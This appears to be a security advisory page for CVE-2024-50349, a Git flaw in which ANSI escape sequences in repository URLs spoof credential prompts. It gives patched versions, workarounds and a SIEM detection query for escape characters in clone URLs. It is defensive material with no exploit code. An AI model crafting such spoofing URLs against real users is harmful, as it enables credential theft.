CVE-2024-50349
📋 TL;DR
This vulnerability allows attackers to craft malicious Git repository URLs containing ANSI escape sequences that manipulate terminal output during credential prompts. When users clone from these URLs, the terminal displays misleading host information, potentially tricking them into providing credentials to attacker-controlled sites instead of legitimate Git hosting services. All Git users who clone repositories via terminal prompts without credential helpers are affected.
💻 Affected Systems
- Git
📦 What is this software?
Git by Git
Git by Git
Git by Git
Git by Git
Git by Git
Git by Git
Git by Git
Git by Git
Git by Git
⚠️ Risk & Real-World Impact
Worst Case
Attackers steal Git credentials by tricking users into providing authentication for trusted sites like GitHub or GitLab, which are then sent to malicious servers under attacker control.
Likely Case
Users inadvertently provide credentials to attacker-controlled repositories when cloning from untrusted URLs, leading to credential theft.
If Mitigated
With proper controls like credential helpers or avoiding untrusted URLs, the impact is minimal as users won't be tricked by malicious terminal output.
🎯 Exploit Status
Exploitation requires social engineering to trick users into cloning malicious URLs. The technical barrier is low once a malicious URL is crafted.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v2.48.1, v2.47.2, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, v2.40.4
Vendor Advisory: https://github.com/git/git/security/advisories/GHSA-hmg8-h7qf-7cxr
Restart Required: No
Instructions:
1. Check current Git version with 'git --version'. 2. If vulnerable, upgrade using your package manager (apt, yum, brew) or download from git-scm.com. 3. Verify upgrade with 'git --version'.
🔧 Temporary Workarounds
Use credential helper
allConfigure Git to use a credential helper (like git-credential-store or git-credential-cache) instead of terminal prompts.
git config --global credential.helper store
Avoid untrusted URLs
allOnly clone repositories from trusted sources and avoid recursive clones from unknown URLs.
🧯 If You Can't Patch
- Avoid cloning repositories from untrusted or unknown sources, especially using recursive clone options.
- Use Git GUI clients or configure credential helpers to bypass terminal-based credential prompts entirely.
🔍 How to Verify
Check if Vulnerable:
Run 'git --version' and compare against patched versions. If version is earlier than v2.48.1, v2.47.2, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, or v2.40.4, you are vulnerable.Check Version:
git --versionVerify Fix Applied:
After upgrading, run 'git --version' to confirm you're on a patched version. Test by attempting to clone a repository that requires credentials - the hostname should display without ANSI escape sequence manipulation.📡 Detection & Monitoring
Log Indicators:
- Unusual Git clone operations from unfamiliar URLs in system logs
- Failed authentication attempts to unexpected Git hosts
Network Indicators:
- Git protocol traffic to unknown or suspicious IP addresses
- Unusual SSH or HTTPS connections during Git operations
SIEM Query:
source="git.log" AND ("clone" OR "fetch") AND url=*%1B*